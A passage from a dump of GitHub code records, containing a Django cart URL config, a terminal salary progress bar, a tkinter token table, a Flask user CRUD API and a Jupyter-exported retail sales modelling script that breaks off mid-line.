\"cart\"\nurlpatterns = [\n path('cart', views.cart_view, name='cart-view'),\n path('clear-cart/', views.clear_cart, name='clear-cart'),\n path('delete//', views.delete_item, name='delete-item'),\n path('check-out', views.cart_check_out, name='cart-check-out'),\n path('update-item/', views.update_cart_Item, name='update-cart-Item'),\n path('order-porcess/', views.order_process, name='order-process'),\n path('pdf-invoice/', views.render_pdf_invoice, name='render-pdf-invoice'),\n\n]\n","repo_name":"ahmedel-tawil/shopping-cart-django","sub_path":"cart/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12901172944","text":"import os,sys\nimport time\nfrom datetime import datetime\n\n# dian@duck.com\n\nclass ColorStr:\n\n green_start = \"\\N{ESC}[32m\"\n gray_start = \"\\N{ESC}[90m\"\n color_end = \"\\u001b[0m\"\n\n @classmethod\n def green(cls, s:str) -> str:\n return cls.green_start + s + cls.color_end\n\n @classmethod\n def gray(cls, s:str) -> str:\n return cls.gray_start + s + cls.color_end\n\n\nclass Money:\n def __init__(self,\n work_days:float = 20,\n month:float = 100,\n daily:float = 3,\n year:float = 1200,\n start:float = 9,\n end:float = 18):\n\n if daily:\n self.day = daily\n elif month:\n self.day = month / work_days\n elif year:\n self.day = year / (12 * work_days)\n else:\n raise ValueError(\"The salary is needed!\")\n\n self.start_hour = int(start)\n self.start_min = int(60 * (start - self.start_hour))\n\n self.end_hour = int(end)\n self.end_min = int(60 * (end - self.end_hour))\n\n self._time_out = 600\n\n self.update_start_end()\n\n def update_start_end(self):\n now = datetime.now()\n self.last_update = now.timestamp()\n\n _s = now.replace(hour=self.start_hour, minute=self.start_min, second=0, microsecond=0)\n self.start = _s.timestamp()\n\n _e = now.replace(hour=self.end_hour, minute=self.end_min, second=0, microsecond=0)\n self.end = _e.timestamp()\n\n self.len = self.end - self.start\n\n def now(self):\n now = datetime.now().timestamp()\n \n if (now - self.last_update) > self._time_out:\n self.update_start_end()\n\n if now < self.start:\n return 0,0\n if now > self.end:\n return 1, self.day\n\n finish = (now - self.start) / self.len\n salary = finish * self.day\n return finish, salary\n\nclass Bar:\n sc = chr(27) + \"[2J\"\n label = \"■\"\n def __init__(self, salary: Money):\n os.system(\"clear\")\n self.m = salary\n\n def format_str(self) -> str:\n total = os.get_terminal_size().columns - 15\n empty = ['' for i in range(total)]\n finish, money = self.m.now()\n count = int(finish * total)\n f_str = self.label.join(empty[:count])\n e_str = self.label.join(empty[count:])\n show_str = \"\\n\" + ColorStr.green(f_str) + ColorStr.gray(e_str) \n show_str = show_str + \" %.2f%% %.0f¥\"%(finish * 100, money) + \"\\n\"\n return show_str\n\n def run(self):\n while True:\n s = self.format_str()\n # sys.stdout.write(\"\\033c\")\n # sys.stdout.flush()\n print(\"\\033c\", end = \"\")\n sys.stdout.write(self.format_str())\n sys.stdout.flush()\n time.sleep(1)\n\ndef main():\n m = Money(daily = 100, start = 9, end = 18)\n bar = Bar(m)\n bar.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"diandianti/money-bar","sub_path":"bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74395354247","text":"from typing import List\n\nfrom tkinter import ttk\nimport customtkinter as ctk\n\nfrom controller.token import Token\n\n# # Modes: \"System\" (standard), \"Dark\", \"Light\"\n\n\nclass TokenTable(ctk.CTkToplevel):\n def __init__(self, parent, tokens: List[Token]):\n super().__init__(parent)\n\n self.title(\"Tabla de tokens\")\n self.geometry(\"800x600\")\n self.resizable(False, False)\n\n self.tokens = tokens\n\n self.grid_columnconfigure(0, weight=1)\n self.grid_rowconfigure(0, weight=1)\n\n self.create_table()\n\n def create_table(self):\n self.treeview = ttk.Treeview(self)\n\n self.treeview['columns'] = (\n 'Correlativo',\n 'Tipo',\n 'Lexema'\n )\n\n self.treeview.column(\"#0\", width=0, stretch=\"NO\")\n self.treeview.column(\"Correlativo\", anchor=\"w\")\n self.treeview.column(\"Tipo\", anchor=\"w\")\n self.treeview.column(\"Lexema\", anchor=\"w\")\n\n self.treeview.heading(\"#0\", text=\"\", anchor=\"center\")\n self.treeview.heading(\n \"Correlativo\", text=\"Correlativo\", anchor=\"w\")\n self.treeview.heading(\"Tipo\", text=\"Tipo\", anchor=\"w\")\n self.treeview.heading(\"Lexema\", text=\"Lexema\", anchor=\"w\")\n self.show_tokens()\n\n self.treeview.grid(row=0, column=0, sticky=\"nsew\", padx=10, pady=10)\n\n def show_tokens(self):\n for index in range(len(self.tokens)):\n self.treeview.insert(\n \"\", \"end\", text=\"\", values=(str(index), self.tokens[index].token_type.name, self.tokens[index].literal))\n","repo_name":"danielcuque/LFP_Proyecto2_202112145","sub_path":"view/token_table.py","file_name":"token_table.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30703305115","text":"import traceback\nfrom flask import Blueprint, abort, request, current_app\nfrom model.empleado import get_empleado\nfrom utils.config import http_error_dict\nfrom utils.environment import get_environment\nfrom bson import json_util\nimport json\n\nfrom model.usuario import get_usuario, delete_usuario, create_usuario, update_usuario\n\nserverConfig = get_environment(\"Server\")\napi_usuario = Blueprint(\"api_usuario\", __name__)\n\n@api_usuario.route(\"/usuario/actualizar/\", methods=[\"PUT\"])\ndef update_api_usuario():\n try:\n usuario = request.get_json()\n\n contraseña = usuario[\"contraseña\"]\n correo = usuario[\"correo\"]\n\n mongo_data = update_db_usuario(contraseña, correo)\n\n return mongo_data, 200\n\n except Exception as e:\n traceback.print_exc()\n abort(http_error_dict[type(e).__name__])\n\n@api_usuario.route(\"/usuario/crear/\", methods=[\"POST\"])\ndef create_api_usuario():\n try:\n usuario = request.get_json()\n\n id_empleado = usuario[\"id_empleado\"]\n nombre_usuario = usuario[\"nombre_usuario\"]\n contraseña = usuario[\"contraseña\"]\n correo = usuario[\"correo\"]\n\n mongo_data = create_db_usuario(id_empleado, nombre_usuario, contraseña, correo)\n\n return mongo_data, 200\n except Exception as e:\n abort(http_error_dict[type(e).__name__])\n\n@api_usuario.route(\"/usuario/ver/\", methods=[\"GET\"])\ndef get_usuario_by_correo(correo):\n try:\n if correo:\n mongo_data = get_db_usuario(correo)\n\n return mongo_data, 200\n else:\n abort(400)\n except Exception as e:\n abort(http_error_dict[type.__name__])\n\n@api_usuario.route(\"/usuario/eliminar/\", methods=[\"DELETE\"])\ndef delete_api_usuario_by_id(id):\n try:\n if id:\n mongo_data = delete_db_usuario(id)\n\n return mongo_data, 200\n else:\n abort(400)\n\n except Exception as e:\n abort(http_error_dict[type(e).__name__])\n\ndef get_db_usuario(id):\n data = None\n mensaje = \"\"\n status = \"Success\"\n response = {}\n try:\n resultado = get_usuario(id)\n if resultado:\n data = json.loads(json.dumps(resultado, default=json_util.default))\n else:\n data = None\n\n status = \"Success\"\n except Exception as e:\n status = \"Error\"\n mensaje = str(e)\n\n response[\"data\"] = data\n response[\"status\"] = status\n response[\"mensaje\"] = mensaje\n\n return response\n\ndef delete_db_usuario(id):\n data = None\n mensaje = \"\"\n status = \"Success\"\n response = {}\n try:\n resultado = delete_usuario(id)\n\n if resultado:\n data = json.loads(json.dumps(resultado, default=json_util.default))\n else:\n data = None\n\n status = \"Success\"\n except Exception as e:\n status = \"Error\"\n mensaje = str(e)\n\n response[\"data\"] = data\n response[\"status\"] = status\n response[\"mensaje\"] = mensaje\n\n return response\n\ndef create_db_usuario(id_empleado, nombre_usuario, contraseña, correo):\n data = None\n mensaje = \"\"\n status = \"Success\"\n response = {}\n try:\n resultado = create_usuario(id_empleado, nombre_usuario, contraseña, correo)\n\n if resultado:\n data = json.loads(json.dumps(get_empleado(id_empleado), default=json_util.default))\n else:\n data = None\n\n status = \"Success\"\n except Exception as e:\n logger = current_app.logger\n status = \"Error\"\n mensaje = str(e)\n logger.info(traceback.print_exc())\n\n response[\"data\"] = data\n response[\"status\"] = status\n response[\"mensaje\"] = mensaje\n\n return response\n\ndef update_db_usuario(contraseña, correo):\n logger = current_app.logger\n data = None\n mensaje = \"\"\n status = \"Success\"\n response = {}\n try:\n resultado = update_usuario(contraseña, correo)\n logger.info(resultado)\n\n if resultado:\n data = json.loads(json.dumps(get_usuario(correo), default=json_util.default))\n else:\n data = None\n\n status = \"Success\"\n except Exception as e:\n status = \"Error\"\n mensaje = str(e)\n\n response[\"data\"] = data\n response[\"status\"] = status\n response[\"mensaje\"] = mensaje\n\n return response","repo_name":"noemylh/api-planilla-db","sub_path":"Proyecyo-desarrolo-web/controller/apiUsuario.py","file_name":"apiUsuario.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21545455568","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import r2_score\nfrom sklearn.linear_model import LinearRegression\n\nimport os\nimport calendar\nimport networkx as nx\nfrom pandas.plotting import scatter_matrix, parallel_coordinates\nimport seaborn as sns\nfrom sklearn import preprocessing\nimport matplotlib.pylab as plt\nfrom sklearn.decomposition import PCA\nfrom sklearn import preprocessing\nimport matplotlib.pylab as plt\n\nimport math\nfrom sklearn.metrics import accuracy_score, roc_curve, auc\nfrom dmba import regressionSummary, classificationSummary, liftChart, gainsChart\nfrom sklearn.linear_model import LinearRegression, Lasso, Ridge, LassoCV, BayesianRidge\nimport statsmodels.formula.api as sm\n\nfrom dmba import regressionSummary, exhaustive_search\nfrom dmba import backward_elimination, forward_selection, stepwise_selection\nfrom dmba import adjusted_r2_score, AIC_score, BIC_score\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.neighbors import NearestNeighbors, KNeighborsClassifier\n\n\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import train_test_split, cross_val_score, GridSearchCV\nfrom dmba import plotDecisionTree, classificationSummary, regressionSummary\n\nimport statsmodels.api as sm\nfrom mord import LogisticIT\nimport matplotlib.pylab as plt\nimport seaborn as sns\nfrom dmba import classificationSummary, gainsChart, liftChart\nfrom dmba.metric import AIC_score\n\nimport statsmodels.formula.api as sm\n\nfrom dmba import regressionSummary, exhaustive_search\nfrom dmba import backward_elimination, forward_selection, stepwise_selection\nfrom dmba import adjusted_r2_score, AIC_score, BIC_score\n\n\n# In[2]:\n\n\nretail = pd.read_csv('retailsales.csv')\n\n\n# In[3]:\n\n\nretail.head(20)\n\n\n# In[4]:\n\n\n# random_state is set to a defined value to get the same partitions when re-running the code\ntrainData= retail.sample(frac=0.6, random_state=1)\n# assign rows that are not already in the training set, into validation \nvalidData = retail.drop(trainData.index)\n\nprint('Training : ', trainData.shape)\nprint('Validation : ', validData.shape)\nprint()\n\n\n# In[5]:\n\n\n# alternative way using scikit-learn\ntrainData, validData = train_test_split(retail, test_size=0.40, random_state=1)\nprint('Training : ', trainData.shape)\nprint('Validation : ', validData.shape)\n\n\n# In[6]:\n\n\nretail_ts = pd.Series(retail.retailsales.values, index=retail.month)\n\n\n# In[8]:\n\n\nplt.plot(retail_ts)\n\n\n# In[9]:\n\n\nplt.plot(retail_ts.index, retail_ts)\nplt.xlabel('time') # set x-axis label\nplt.ylabel('Retailsales (in mil)') # set y-axis label\n\n\n# In[15]:\n\n\n#2)Histogram\n\nax = retail.retailsales.hist()\nax.set_xlabel('retailsales')\nax.set_ylabel('count')\n\nplt.show()\n\n\n# In[11]:\n\n\n#3)Boxplot\n\nax = retail.boxplot(column='retailsales')\nax.set_ylabel('retailsales')\nplt.suptitle('') # Suppress the titles\nplt.title('')\n\t\nplt.show()\n\n\n# In[12]:\n\n\n#4)Subplots\n\nfig, axes = plt.subplots(nrows=1, ncols=4)\nretail.boxplot(column='retailsales', ax=axes[0])\nretail.boxplot (column='percapitaincome', ax=axes[1])\nretail.boxplot (column='population', ax=axes[2])\nretail.boxplot (column='unemployment', ax=axes[3])\nfor ax in axes:\n ax.set_xlabel('subplot')\nplt.suptitle('') # Suppress the overall title\nplt.tight_layout() # Increase the separation between the plots\n\nplt.show()\n\n\n# In[13]:\n\n\n#5) Correlation\n\ncorr = retail.corr()\nsns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns)\n\n\n# Change the colormap to a divergent scale and fix the range of the colormap\nsns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns, vmin=-1, vmax=1, cmap=\"RdBu\")\n\n# Include information about values\nfig, ax = plt.subplots()\nfig.set_size_inches(7, 4)\nsns.heatmap(corr, annot=True, fmt=\".2f\", cmap=\"RdBu\", center=0.7, vmin=-1.0, vmax=1.0, ax=ax)\n\nplt.show()\n\n\n\n# Color the points by the value\nretail.plot.scatter(x='retailsales', y='percapitaincome')\n\n\n# In[14]:\n\n\n#Compute mean, standard dev., min, max, median, length, and missing values for all variables\npd.DataFrame({'mean': retail.mean(),\n 'sd': retail.std(),\n 'min': retail.min(),\n 'max': retail.max(),\n 'median': retail.median(),\n 'length': len(retail),\n 'miss.val': retail.isnull().sum(),\n })\n\n\n# In[16]:\n\n\n#Correlation matrix\n\nretail.corr().round(2)\n\n\n# In[17]:\n\n\n\n#PCA analysis\n\nretail = pd.read_csv('retailsales.csv')\npcs = PCA(n_components=2)\npcs.fit(retail[['percapitaincome', 'population']])\n\npcsSummary = pd.DataFrame({'Standard deviation': np.sqrt(pcs.explained_variance_),\n 'Proportion of variance': pcs.explained_variance_ratio_,\n 'Cumulative proportion': np.cumsum(pcs.explained_variance_ratio_)})\npcsSummary = pcsSummary.transpose()\npcsSummary.columns = ['PC1', 'PC2']\npcsSummary.round(4)\n\n\n# In[20]:\n\n\n#The components_ field of pcs gives the individual components. \n#The columns in this matrix are the principal components PC1, PC2.\n#The rows are variables in the order they are found in the input matrix, calories and rating. Below is code for weight#\n\n\npcsComponents_df = pd.DataFrame(pcs.components_.transpose(), columns=['PC1', 'PC2'], \n index=['percapitaincome', 'population'])\npcsComponents_df\n\n\n# In[21]:\n\n\n#Use the transform method to get the scores.\n\nscores = pd.DataFrame(pcs.transform(retail[['percapitaincome', 'population']]), \n columns=['PC1', 'PC2'])\nscores.head()\n\n\n#Perform a principal component analysis of the whole table ignoring the first non-numerical column.\n\npcs = PCA()\npcs.fit(retail.iloc[:, 2:6].dropna(axis=0))\npcsSummary_df = pd.DataFrame({'Standard deviation': np.sqrt(pcs.explained_variance_),\n 'Proportion of variance': pcs.explained_variance_ratio_,\n 'Cumulative proportion': np.cumsum(pcs.explained_variance_ratio_)})\npcsSummary_df = pcsSummary_df.transpose()\npcsSummary_df.columns = ['PC{}'.format(i) for i in range(1, len(pcsSummary_df.columns) + 1)]\npcsSummary_df.round(4)\n\n\npcsComponents_df = pd.DataFrame(pcs.components_.transpose(), columns=pcsSummary_df.columns, \n index=retail.iloc[:, 2:6].columns)\npcsComponents_df.iloc[:,:6]\n\n\n# In[23]:\n\n\n#Multiple linear Regression\n\nretail = pd.read_csv('retailsales.csv')\n\npredictors = ['percapitaincome', 'population', 'unemployment', 'inventory', 'yoygtenp', 'inventorygrowthabovefive', 'percapitagrowthabove']\noutcome = 'retailsales'\n\nX = pd.get_dummies(retail[predictors], drop_first=True)\nY = retail[outcome]\n\ntrain_X, valid_X, train_Y, valid_Y = train_test_split(X, Y, test_size=0.4, random_state=1)\n\n# train linear regression model\nreg = LinearRegression()\nreg.fit(train_X, train_Y)\n\n\n# In[24]:\n\n\n# print coefficients\nprint('intercept ', reg.intercept_)\nprint(pd.DataFrame({'Predictor': X.columns, 'coefficient': reg.coef_}))\n\n\n# In[25]:\n\n\n# evaluate performance\n# training\nregressionSummary(train_Y, reg.predict(train_X))\n# validation\nregressionSummary(valid_Y, reg.predict(valid_X))\n\n\n# In[26]:\n\n\npred_error_train = pd.DataFrame({\n 'residual': train_Y - reg.predict(train_X), \n 'data set': 'training'\n})\npred_error_valid = pd.DataFrame({\n 'residual': valid_Y - reg.predict(valid_X), \n 'data set': 'validation'\n})\nboxdata_df = pred_error_train.append(pred_error_valid, ignore_index=True)\n\nfig, axes = plt.subplots(nrows=1, ncols=3)\nfig.set_size_inches(9, 4)\ncommon = {'bins': 100, 'range': [-30000, 30000]}\npred_error_train.hist(ax=axes[0], **common)\npred_error_valid.hist(ax=axes[1], **common)\nboxdata_df.boxplot(ax=axes[2], by='data set')\n\naxes[0].set_title('training')\naxes[1].set_title('validation')\naxes[2].set_title(' ')\naxes[2].set_ylim(-30000, 30000)\nplt.suptitle('Prediction errors') \nplt.subplots_adjust(bottom=0.15, top=0.85, wspace=0.35)\n\nplt.show()\n\n\n# In[27]:\n\n\n#Adjusted R2 BIC and AIC\n\npred_Y = reg.predict(train_X)\n\nprint('adjusted r2 : ', adjusted_r2_score(train_Y, pred_Y, reg))\nprint('AIC : ', AIC_score(train_Y, pred_Y, reg))\nprint('BIC : ', BIC_score(train_Y, pred_Y, reg))\n\n\n\n\n# Use predict() to make predictions on a new set\nreg_lm_pred = reg.predict(valid_X)\n\nresult = pd.DataFrame({'Predicted': reg_lm_pred, 'Actual': valid_Y,\n 'Residual': valid_Y - reg_lm_pred})\nprint(result.head(20))\n\n# Compute common accuracy measures\nregressionSummary(valid_Y, reg_lm_pred)\n\n\n#determine residuals and create histogram\n\nreg_lm_pred = reg.predict(valid_X)\nall_residuals = valid_Y - reg_lm_pred\n\n# Determine the percentage of datapoints with a residual in [-24000, 24000] = approx. 75\\%\nprint(len(all_residuals[(all_residuals > -24000) & (all_residuals < 24000)]) / len(all_residuals))\n\nax = pd.DataFrame({'Residuals': all_residuals}).hist(bins=25)\n\nplt.tight_layout()\nplt.show()\n\n\n# In[28]:\n\n\n#Exhaustive search for reducing predictors - ranks variables and need and gives scores\n\ndef train_model(variables):\n model = LinearRegression()\n model.fit(train_X[variables], train_Y)\n return model\n\ndef score_model(model, variables):\n pred_Y = model.predict(train_X[variables])\n # we negate as score is optimized to be as low as possible\n return -adjusted_r2_score(train_Y, pred_Y, model)\n\nallVariables = train_X.columns\nresults = exhaustive_search(allVariables, train_model, score_model)\n\ndata = []\nfor result in results:\n model = result['model']\n variables = result['variables']\n AIC = AIC_score(train_Y, model.predict(train_X[variables]), model)\n \n d = {'n': result['n'], 'r2adj': -result['score'], 'AIC': AIC}\n d.update({var: var in result['variables'] for var in allVariables})\n data.append(d)\npd.set_option('display.width', 100)\nprint(pd.DataFrame(data, columns=('n', 'r2adj', 'AIC') + tuple(sorted(allVariables))))\npd.reset_option('display.width')\n\n\n# In[29]:\n\n\n#backward elimination\n\ndef train_model(variables):\n model = LinearRegression()\n model.fit(train_X[variables], train_Y)\n return model\n\ndef score_model(model, variables):\n return AIC_score(train_Y, model.predict(train_X[variables]), model)\n\nbest_model, best_variables = backward_elimination(train_X.columns, train_model, score_model, verbose=True)\n\nprint(best_variables)\n\nregressionSummary(valid_Y, best_model.predict(valid_X[best_variables]))\n\n\n# In[30]:\n\n\n# Forward selection\n\n# The initial model is the constant model - this requires special handling\n# in train_model and score_model\ndef train_model(variables):\n if len(variables) == 0:\n return None\n model = LinearRegression()\n model.fit(train_X[variables], train_Y)\n return model\n\ndef score_model(model, variables):\n if len(variables) == 0:\n return AIC_score(train_Y, [train_Y.mean()] * len(train_Y), model, df=1)\n return AIC_score(train_Y, model.predict(train_X[variables]), model)\n\nbest_model, best_variables = forward_selection(train_X.columns, train_model, score_model, verbose=True)\n\nprint(best_variables)\n\n\n# In[31]:\n\n\n#stepwise_selection\n\nbest_model, best_variables = stepwise_selection(train_X.columns, train_model, score_model, verbose=True)\n\nprint(best_variables)\n\n\n# In[37]:\n\n\n# Regularization (Shrinkage Models)\n\nlasso = Lasso(normalize=True, alpha=1)\nlasso.fit(train_X, train_Y)\nregressionSummary(valid_Y, lasso.predict(valid_X))\n\nlasso_cv = LassoCV(normalize=True, cv=5)\n\nlasso_cv.fit(train_X, train_Y)\nregressionSummary(valid_Y, lasso_cv.predict(valid_X))\nprint('Lasso-CV chosen regularization: ', lasso_cv.alpha_)\nprint(lasso_cv.coef_)\n\nridge = Ridge(normalize=True, alpha=1)\nridge.fit(train_X, train_Y)\nregressionSummary(valid_Y, ridge.predict(valid_X))\n\nbayesianRidge = BayesianRidge(normalize=True)\nbayesianRidge.fit(train_X, train_Y)\nregressionSummary(valid_Y, bayesianRidge.predict(valid_X))\nprint('Bayesian ridge chosen regularization: ', bayesianRidge.lambda_ / bayesianRidge.alpha_)\n\n\n# In[42]:\n\n\nreg = LinearRegression()\nreg.fit(train_X, train_Y)\n\npd.DataFrame({'features': train_X.columns, 'coefficient': reg.coef_, \n 'lasso': lasso.coef_, 'lassoCV': lasso_cv.coef_, 'bayesianRidge': bayesianRidge.coef_})\n\n\n# run a linear regression of sales on the remaining predictors in the training set\ntrain_df = train_X.join(train_Y)\n\npredictors = train_X.columns\nformula = 'retailsales ~ ' + ' + '.join(predictors)\n\nreg = sm.ols(formula=formula, data=train_df).fit()\nprint(reg.summary())\n\n\n# In[43]:\n\n\n#KNN\n\nretail = pd.read_csv('retailsales1.csv')\n\nretail['Number'] = retail.index + 1\nretail\n\n#train and valid KNN\n\ntrainData, validData = train_test_split(retail, test_size=0.4, random_state=26)\nprint(trainData.shape, validData.shape)\nnewretail = pd.DataFrame([{'inventorygrowth': 5, 'populationgrowth': 1.1}])\nnewretail\n\n#scatterplot\nfig, ax = plt.subplots()\n\nsubset = trainData.loc[trainData['yoygtenp']=='NO']\nax.scatter(subset.inventorygrowth, subset.populationgrowth, marker='o', label='NOGROWTH', color='C1')\n\nsubset = trainData.loc[trainData['yoygtenp']=='YES']\nax.scatter(subset. inventorygrowth, subset. populationgrowth, marker='D', label='GROWTH', color='C0')\n\nax.scatter(newretail.inventorygrowth, newretail.populationgrowth, marker='*', label='Newretail', color='black', s=150)\n\nplt.xlabel('inventorygrowth') # set x-axis label\nplt.ylabel('populationgrowth') # set y-axis label\nfor _, row in trainData.iterrows():\n ax.annotate(row.Number, (row.inventorygrowth + 2, row. populationgrowth))\n \nhandles, labels = ax.get_legend_handles_labels()\nax.set_xlim(0, 15)\nax.set_ylim(0, 2)\nax.legend(handles, labels, loc=4)\n\nplt.show()\n\n\n\ndef plotDataset(ax, data, showLabel=True, **kwargs):\n subset = data.loc[data['yoygtenp']=='NO']\n ax.scatter(subset.inventorygrowth, subset.populationgrowth, marker='o', label='NO' if showLabel else None, color='C1', **kwargs)\n\n subset = data.loc[data['yoygtenp']=='YES']\n ax.scatter(subset.inventorygrowth, subset.populationgrowth, marker='D', label='YES' if showLabel else None, color='C0', **kwargs)\n\n plt.xlabel('inventorygrowth') # set x-axis label\n plt.ylabel('populationgrowth') # set y-axis label\n for _, row in data.iterrows():\n ax.annotate(row.Number, (row.inventorygrowth + 2, row.populationgrowth))\n\nfig, ax = plt.subplots()\n\nplotDataset(ax, trainData)\nplotDataset(ax, validData, showLabel=False, facecolors='none')\n\nax.scatter(newretail.inventorygrowth, newretail.populationgrowth, marker='*', label='Newretail ', color='black', s=150)\n\nplt.xlabel('inventorygrowth') # set x-axis label\nplt.ylabel('populationgrowth') # set y-axis label\n \nhandles, labels = ax.get_legend_handles_labels()\nax.set_xlim(1, 15)\nax.legend(handles, labels, loc=4)\n\nplt.show()\n\n\n\n#Initialize normalized training, validation, and complete data frames. Use the training data to learn the transformation.\n\n\nscaler = preprocessing.StandardScaler()\nscaler.fit(trainData[['inventorygrowth', 'populationgrowth']]) # Note the use of an array of column names\n\n# Transform the full dataset\nretailNorm = pd.concat([pd.DataFrame(scaler.transform(retail[['inventorygrowth', 'populationgrowth']]), \n columns=['zinventorygrowth', 'zpopulationgrowth']),\n retail[['yoygtenp', 'Number']]], axis=1)\ntrainNorm = retailNorm.iloc[trainData.index]\nvalidNorm = retailNorm.iloc[validData.index]\nnewretailNorm = pd.DataFrame(scaler.transform(newretail), columns=['zinventorygrowth', 'zpopulationgrowth'])\n\n\n# In[44]:\n\n\n\n#Use k-nearest neighbour\n\nknn = NearestNeighbors(n_neighbors=3)\nknn.fit(trainNorm[['zinventorygrowth', 'zpopulationgrowth']])\ndistances, indices = knn.kneighbors(newretailNorm)\nprint(trainNorm.iloc[indices[0], :]) # indices is a list of lists, we are only interested in the first element\n\n\n# In[45]:\n\n\n#accuracy\n\ntrain_X = trainNorm[['zinventorygrowth', 'zpopulationgrowth']]\ntrain_y = trainNorm['yoygtenp']\nvalid_X = validNorm[['zinventorygrowth', 'zpopulationgrowth']]\nvalid_y = validNorm['yoygtenp']\n\n# Train a classifier for different values of k\nresults = []\nfor k in range(1, 12):\n knn = KNeighborsClassifier(n_neighbors=k).fit(train_X, train_y)\n results.append({\n 'k': k,\n 'accuracy': accuracy_score(valid_y, knn.predict(valid_X))\n })\n\n# Convert results to a pandas data frame\nresults = pd.DataFrame(results)\nprint(results)\n\n\n# Retrain with full dataset---KNN\nretail_X = retailNorm[['zinventorygrowth', 'zpopulationgrowth']]\nretail_y = retailNorm['yoygtenp']\nknn = KNeighborsClassifier(n_neighbors=4).fit(retail_X, retail_y)\ndistances, indices = knn.kneighbors(newretailNorm)\nprint(knn.predict(newretailNorm))\nprint('Distances',distances)\nprint('Indices', indices)\nprint(retailNorm.iloc[indices[0], :])\n\n\n# In[46]:\n\n\n#NAIVE BAYES\n\nretail = pd.read_csv('retailsales2.csv')\nretail.head()\n\n# convert to categorical\nretail.inventorygrowthabovefive = retail.inventorygrowthabovefive.astype('category')\nretail.populationgrowthabove = retail.populationgrowthabove.astype('category')\n\n\npredictors = ['inventorygrowthabovefive', 'populationgrowthabove']\noutcome = 'yoygtenp'\n\nX = pd.get_dummies(retail[predictors])\ny = (retail[outcome] == 'NO').astype(int)\nclasses = ['YES', 'NO']\n\n# split into training and validation\nX_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.40, random_state=1)\n\n# run naive Bayes\nretail_nb = MultinomialNB(alpha=0.01)\nretail_nb.fit(X_train, y_train)\n\n# predict probabilities\npredProb_train = retail_nb.predict_proba(X_train)\npredProb_valid = retail_nb.predict_proba(X_valid)\n\n# predict class membership\ny_valid_pred = retail_nb.predict(X_valid)\ny_train_pred = retail_nb.predict(X_train)\n\n\nretail.inventorygrowthabovefive = retail.inventorygrowthabovefive.astype('category')\nretail.populationgrowthabove = retail.populationgrowthabove.astype('category')\n\nretail['yoygtenp'] = retail['yoygtenp'].astype('category')\n\n\npredictors = ['inventorygrowthabovefive', 'populationgrowthabove']\noutcome = 'yoygtenp'\n\nX = pd.get_dummies(retail[predictors])\ny = retail['yoygtenp']\nclasses = list(y.cat.categories)\n\n# split into training and validation\nX_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=0.40, random_state=1)\n\n# run naive Bayes\nretail_nb = MultinomialNB(alpha=0.01)\nretail_nb.fit(X_train, y_train)\n\n# predict probabilities\npredProb_train = retail_nb.predict_proba(X_train)\npredProb_valid = retail_nb.predict_proba(X_valid)\n\n# predict class membership\ny_valid_pred = retail_nb.predict(X_valid)\ny_train_pred = retail_nb.predict(X_train)\n\n\n#First construct a frequency table and then convert it to the propability table\n\n\n# split the original data frame into a train and test using the same random_state\ntrain_df, valid_df = train_test_split(retail, test_size=0.4, random_state=1)\n\npd.set_option('precision', 4)\n# probability of flight status\nprint(train_df['yoygtenp'].value_counts() / len(train_df))\nprint()\n\nfor predictor in predictors:\n # construct the frequency table\n df = train_df[['yoygtenp', predictor]]\n freqTable = df.pivot_table(index='yoygtenp', columns=predictor, aggfunc=len)\n\n # divide each row by the sum of the row to get conditional probabilities\n propTable = freqTable.apply(lambda x: x / sum(x), axis=1)\n print(propTable)\n print()\npd.reset_option('precision')\n\n\n\n# Subset a specific set/ predicting for new data\ndf = pd.concat([pd.DataFrame({'actual': y_valid, 'predicted': y_valid_pred}),\n pd.DataFrame(predProb_valid, index=y_valid.index)], axis=1)\nmask = ((X_valid.inventorygrowthabovefive_YES == 1) & (X_valid. populationgrowthabove_YES == 1))\n\nprint(df[mask])\n\n\n\n#Confusionmatrix\nclassificationSummary(y_train, y_train_pred, class_names=classes) \n\nprint()\n\nclassificationSummary(y_valid, y_valid_pred, class_names=classes)\n\n\n# In[47]:\n\n\n#Regressiontree\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nfrom pathlib import Path\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import train_test_split, cross_val_score, GridSearchCV\nimport matplotlib.pylab as plt\nfrom dmba import plotDecisionTree, classificationSummary, regressionSummary\n\n\nretail = pd.read_csv('retailsales.csv')\n\npredictors = ['percapitaincome', 'population', 'unemployment', 'inventory', 'yoygtenp', 'inventorygrowthabovefive', 'percapitagrowthabove']\noutcome = 'retailsales'\n\nX = pd.get_dummies(retail[predictors], drop_first=True)\ny = retail[outcome]\n\ntrain_X, valid_X, train_y, valid_y = train_test_split(X, y, test_size=0.4, random_state=1)\n\n# user grid search to find optimized tree\nparam_grid = {\n 'max_depth': [5, 10, 15, 20, 25], \n 'min_impurity_decrease': [0, 0.001, 0.005, 0.01], \n 'min_samples_split': [10, 20, 30, 40, 50], \n}\ngridSearch = GridSearchCV(DecisionTreeRegressor(), param_grid, cv=5, n_jobs=-1)\ngridSearch.fit(train_X, train_y)\nprint('Initial parameters: ', 